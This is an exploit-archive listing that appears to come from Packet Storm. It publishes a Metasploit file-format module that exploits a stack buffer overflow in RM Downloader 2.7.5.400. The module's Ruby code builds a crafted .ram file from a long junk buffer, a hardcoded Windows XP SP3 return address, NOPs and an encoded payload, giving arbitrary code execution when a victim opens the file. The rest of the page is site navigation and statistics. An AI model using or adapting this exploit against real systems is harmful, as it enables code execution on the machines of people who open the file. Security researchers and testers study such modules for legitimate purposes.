RM Downloader 2.7.5.400 Local Buffer Overflow

RM Downloader 2.7.5.400 Local Buffer Overflow: Posted May 5, 2015; Authored by TUNISIAN CYBER | Site metasploit.com; This Metasploit module exploits a stack buffer overflow in RM Downloader version 2.7.5.400 by creating a specially crafted .ram file allowing an attacker the able to execute arbitrary code.; tags | exploit, overflow, arbitrary; SHA-256 | 293cb8c3c282805664ef99e29f1a66bbc60b01027640ccdda575edd5305c83d4; Download | Favorite | View

RM Downloader 2.7.5.400 Local Buffer Overflow

###
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: RM Downloader v2.7.5.400 Local Buffer Overflow (MSF)
#[+] Date: 25-03-2015
#[+] Type: Local Exploits
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Vendor: http://software-files-a.cnet.com/s/software/10/65/60/49/Mini-streamRM-MP3Converter.exe?token=1427318981_98f71d0e10e2e3bd2e730179341feb0a&fileName=Mini-streamRM-MP3Converter.exe
#[+] Twitter: @TCYB3R
##
   
##
# $Id: rmdownloader_bof.rb  2015-04-01 03:03  TUNISIAN CYBER $
##
   
require 'msf/core'
    
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
    
  include Msf::Exploit::FILEFORMAT
    
   def initialize(info = {})
    super(update_info(info,
     'Name' => 'RM Downloader v2.7.5.400 Local Buffer Overflow',
         'Description' => %q{
          This module exploits a stack buffer overflow in RM Downloader v2.7.5.400
          creating a specially crafted .ram file, an attacker may be able 
      to execute arbitrary code.
        },
     'License' => MSF_LICENSE,
     'Author' => 
           [
            'TUNISIAN CYBER', # Original
            'TUNISIAN CYBER' # MSF Module
            ],
     'Version' => 'Version 2.7.5.400',
     'References' =>
        [
         [ 'URL', 'https://www.exploit-db.com/exploits/36502/' ],
        ],
    'DefaultOptions' =>
       {
        'EXITFUNC' => 'process',
       },
     'Payload' =>
      {
        'Space' => 1024,
        'BadChars' => "\x00\x0a\x0d",
        'StackAdjustment' => -3500,
      },
     'Platform' => 'win',
     'Targets' =>
       [
        [ 'Windows XP-SP3 (EN)', { 'Ret' => 0x7C9D30D7} ]
       ],
      'Privileged' => false,
      'DefaultTarget' => 0))
    
      register_options(
       [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.ram']),
       ], self.class)
    end
    
    def exploit
   
    sploit = rand_text_alphanumeric(35032) # Buffer Junk
      sploit << [target.ret].pack('V')
      sploit << make_nops(4)
      sploit << payload.encoded
   
      tc = sploit
      print_status("Creating '#{datastore['FILENAME']}' file ...")
      file_create(tc)
   
    end
    
end

Top Authors In Last 30 Days

Red Hat 184 files
Ubuntu 88 files
Gentoo 23 files
Debian 20 files
tmrswrr 8 files
Amit Roy 4 files
bRpsd 3 files
Aslam Anwar Mahimkar 3 files
Jann Horn 3 files
Google Security Research 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,074)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,523)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,242)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,193)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,636)
UNIX (9,424)
UnixWare (187)
Windows (6,665)
Other

RM Downloader 2.7.5.400 Local Buffer Overflow

RM Downloader 2.7.5.400 Local Buffer Overflow

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

RM Downloader 2.7.5.400 Local Buffer Overflow

Share This

RM Downloader 2.7.5.400 Local Buffer Overflow

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems